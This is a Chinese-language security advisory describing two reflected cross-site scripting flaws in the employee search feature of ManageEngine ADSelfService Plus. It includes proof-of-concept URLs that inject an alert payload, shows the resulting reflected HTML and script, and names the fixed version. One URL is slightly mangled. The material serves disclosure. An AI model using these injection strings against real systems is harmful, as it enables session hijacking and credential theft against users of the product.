ManageEngine ADSelfService Plus是一个安全的,基于Web的最终用户自助服务密码重置方案。ManageEngine ADSelfService Plus存在安全漏洞,相关雇员搜索功能存在跨站脚本问题。第一个问题存在于http://SERVER/EmployeeSearch.cc?actionId=showList中,提交类似如下注入:http://SERVER/EmployeeSearch.cc?actionId=showList&searchString=alice%22%20onmouseover=%22alert%28%27xss%27%29¶meterName=name&searchType=contains如上会导致如下的HTML提交给用户:<option value="equals" > Equals</option></select><input type="text" name="searchString" id="searchTextField" class="textfield" value="alice" onmouseover="alert('xss')" onkeypress="javascript:return searchOnKeyPressEvent(event)"><input type="button" name="search" id="search" class="button" value=" Go " onclick="javascript:searchAD()"></td><tr>第二个问题存在于http://SERVER/EmployeeSearch.cc?actionId=Search,此页面接收搜索参数,然后创建发送给http://SERVER/EmployeeSearch.cc?actionId=showList的表单。在创建过程中,未过滤输入会以如下所示的javasript块反映给用户:<script> var searchValue = 'alice'; alert('xss'); var a='a'; var paramName = 'name'; var searchType = 'contains';</script>如上的例子可通过如下链接生成:http://SERVER/EmployeeSearch.cc?actionId=Search&parameterName=name&searchType=contains&searchString=alice%22+onMouseOver%3D%22javascript%3Aalert%28%27xss%27%29
ZOHO Corporation ManageEngine ADSelfService Plus 4.5 Build 4500已经修复此漏洞,建议用户下载使用:http://www.manageengine.com/products/self-service-password/index.html